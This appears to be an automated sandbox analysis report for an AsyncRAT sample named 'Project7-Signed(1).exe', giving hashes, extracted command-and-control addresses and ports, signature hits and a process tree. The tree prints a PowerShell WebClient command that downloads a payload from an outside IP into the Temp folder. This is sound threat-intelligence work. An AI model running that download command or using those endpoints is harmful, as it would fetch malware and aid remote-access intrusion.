Analysis
-
max time kernel
131s -
max time network
141s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
28/01/2025, 06:27
Static task
static1
Behavioral task
behavioral1
Sample
Project7-Signed(1).exe
Resource
win7-20240903-en
General
-
Target
Project7-Signed(1).exe
-
Size
87KB
-
MD5
1663d645dfd98ddeb2cda808bde92132
-
SHA1
470c7ee8a9db8b601bfe1b77e226ba8cddedf3f3
-
SHA256
c8125da7bb61057ae54927bfbe57d59f8c3d7a85b3ee2a67aca57cbba9e4cae9
-
SHA512
fd682199784175fe352596c29a8ca2c8d9371bdac310e2e04c131d23a8b106fb02987e76376ad36d5d8c5e733387e03eb6625fba1bc0a425cd1a00b75654c2cb
-
SSDEEP
1536:IprmwRE0hYuiIeKHJ6W3T3L+MvX+P60cGg9QcAxv7s5+7hEupWqP:IZV/YwhJ66T3L+mOP6DIPxv7x7hEuE2
Malware Config
Extracted
http://149.88.66.68/test.mp3
Extracted
asyncrat
127.0.0.1:5419
127.0.0.1:5418
127.0.0.1:13792
123.99.198.130:5419
123.99.198.130:5418
123.99.198.130:13792
-
delay
1
-
install
true
-
install_file
1.exe
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/memory/1740-21-0x00000000003B0000-0x00000000003C6000-memory.dmp family_asyncrat -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2832 powershell.exe -
pid Process 2832 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2832 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2832 powershell.exe Token: SeDebugPrivilege 1740 Project7-Signed(1).exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1740 wrote to memory of 2852 1740 Project7-Signed(1).exe 31 PID 1740 wrote to memory of 2852 1740 Project7-Signed(1).exe 31 PID 1740 wrote to memory of 2852 1740 Project7-Signed(1).exe 31 PID 2852 wrote to memory of 2832 2852 cmd.exe 33 PID 2852 wrote to memory of 2832 2852 cmd.exe 33 PID 2852 wrote to memory of 2832 2852 cmd.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\Project7-Signed(1).exe"C:\Users\Admin\AppData\Local\Temp\Project7-Signed(1).exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell(new-object System.Net.WebClient).DownloadFile('http://149.88.66.68/test.mp3','%Temp%/test.bin')2⤵
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (new-object System.Net.WebClient).DownloadFile('http://149.88.66.68/test.mp3','C:\Users\Admin\AppData\Local\Temp/test.bin')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2832
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
97KB
MD525eb336fb823b92ac4ccc5410ef442b9
SHA193ecef340c7f652323ef950726d97cd377ba503a
SHA25695205dd5c450dff05f04c289e394fbb460ad16038c879a1c8dd594a959adcfe5
SHA512d1adc692c408fa679794bacc9355538001d44a9cceba3ee88d69db1dd73869c67d741e6b0dbf4e5902a13f7c8f62ce6f7865ae1acf190cefe4d7fd8816c1abf1